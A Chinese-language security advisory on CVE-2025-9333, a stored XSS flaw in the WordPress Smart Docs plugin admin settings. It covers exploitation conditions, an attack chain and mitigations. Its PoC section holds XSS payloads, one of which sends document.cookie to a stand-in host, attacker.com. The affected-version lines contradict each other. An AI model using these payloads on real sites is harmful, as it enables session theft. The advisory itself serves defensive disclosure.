CVE-2025-9333：WordPress Smart Docs插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-9333

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

5.5 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

WordPress Smart Docs插件

漏洞概述

CVE-2025-9333是WordPress Smart Docs插件中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞影响该插件所有版本，最高包括1.1.1版本。漏洞的根本原因在于插件的管理员设置页面中缺乏充分的输入清理（input sanitization）和输出转义（output escaping）机制，使得具有管理员级别权限及以上的认证攻击者能够在插件设置中注入任意Web脚本。当其他用户访问被注入的页面时，这些恶意脚本将在受害者浏览器中执行。值得注意的是，该漏洞仅在多站点（multi-site）安装以及禁用了unfiltered_html功能的安装环境中可被利用。在标准WordPress单站点安装中，管理员默认具有unfiltered_html权限，因此该漏洞的影响范围受到一定限制。该漏洞由Wordfence安全团队的安全研究员发现，CVSS 3.1评分为5.5分，属于中等严重等级。漏洞的攻击向量为网络攻击，需要高权限认证，不涉及用户交互，对机密性和完整性产生低影响，对可用性无影响。

技术细节

该存储型XSS漏洞存在于Smart Docs插件的管理员设置功能中。漏洞的技术原理如下：

1. **输入验证缺失**：插件在处理管理员提交的配置数据时，未对用户输入进行充分的清理和过滤。攻击者可以通过构造包含恶意JavaScript代码的输入字段，将恶意脚本作为正常配置数据存储到数据库中。

2. **输出转义不足**：当其他用户（包括其他管理员或订阅者）访问包含这些设置数据的页面时，插件直接将存储的数据输出到HTML页面中，而未对数据进行HTML实体编码或适当的转义处理，导致恶意脚本在受害者浏览器中执行。

3. **利用条件**：该漏洞的利用需要满足两个条件之一：
- WordPress运行在多站点（multisite/network）模式下，在该模式下超级管理员之外的站点管理员不具有unfiltered_html权限
- 在单站点模式下，管理员的unfiltered_html功能被显式禁用

4. **攻击影响**：成功利用此漏洞后，攻击者可以：窃取其他用户的会话cookie、进行权限提升（通过获取管理员cookie）、植入后门、进行钓鱼攻击、重定向用户到恶意网站、修改页面内容等。由于该漏洞需要管理员权限才能利用，因此主要威胁来自已被入侵的管理员账户或内部威胁。

攻击链分析

STEP 1

步骤1：获取管理员权限

攻击者需要先获取WordPress站点的管理员级别权限，可以通过钓鱼、密码爆破、购买凭证或利用其他漏洞获取。

STEP 2

步骤2：导航到Smart Docs设置页面

攻击者登录WordPress后台，导航到Smart Docs插件的管理设置页面，识别可注入的输入字段。

STEP 3

步骤3：注入恶意脚本

在插件的设置字段中注入包含恶意JavaScript代码的payload，例如窃取cookie、重定向或权限提升的脚本。

STEP 4

步骤4：存储恶意内容

保存设置后，恶意脚本被存储到WordPress数据库中，作为正常的配置数据存在。

STEP 5

步骤5：触发脚本执行

当其他用户（管理员、编辑或其他有权限的用户）访问包含该设置的页面时，恶意脚本在其浏览器中执行。

STEP 6

步骤6：执行恶意操作

恶意脚本可以窃取会话cookie、创建新的管理员账户、植入Web Shell、修改内容或进行其他恶意活动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- 
PoC for CVE-2025-9333 - Smart Docs Stored XSS
This PoC demonstrates how an authenticated administrator can inject
malicious JavaScript through the plugin's admin settings.
-->

<!-- Step 1: Attacker navigates to Smart Docs plugin admin settings page -->
<!-- Step 2: In the vulnerable input field (e.g., document title, description, or settings field), inject the following payload: -->

<script>alert(document.cookie);</script>

<!-- 
Alternatively, a more sophisticated payload for cookie theft:
-->

<script>
var img = new Image();
img.src = "https://attacker.com/steal?cookie=" + document.cookie;
</script>

<!-- 
Or using event handlers in input fields:
-->

" onmouseover="alert('XSS')" autofocus onfocus="alert(document.domain)"

<!-- 
Step 3: Save the settings - the malicious payload is stored in the database
Step 4: When any user (including other admins) views the affected page,
        the script executes in their browser context
-->

<?php
// Example of vulnerable code pattern (not actual plugin code):
// The following pattern demonstrates the missing sanitization:

// VULNERABLE: No sanitization or escaping
$setting_value = $_POST['smart_docs_setting'];
update_option('smart_docs_option', $setting_value);
// Later when rendered:
echo '<div>' . get_option('smart_docs_option') . '</div>';

// SECURE: Proper sanitization and escaping
$setting_value = sanitize_text_field($_POST['smart_docs_setting']);
update_option('smart_docs_option', $setting_value);
// Later when rendered:
echo '<div>' . esc_html(get_option('smart_docs_option')) . '</div>';
?>

影响范围

WordPress Smart Docs插件 < 1.1.1

WordPress Smart Docs插件所有版本（包括1.1.1）

防御指南

临时缓解措施

在等待官方补丁发布之前，建议采取以下临时缓解措施：1）限制Smart Docs插件的使用范围，仅在必要时启用；2）审计所有管理员账户，确保没有未授权的管理员存在；3）部署Wordfence等安全插件，配置XSS防护规则；4）在多站点网络中，将站点管理员的unfiltered_html权限保持禁用状态；5）监控插件设置页面的异常变更；6）考虑临时停用Smart Docs插件直到补丁发布。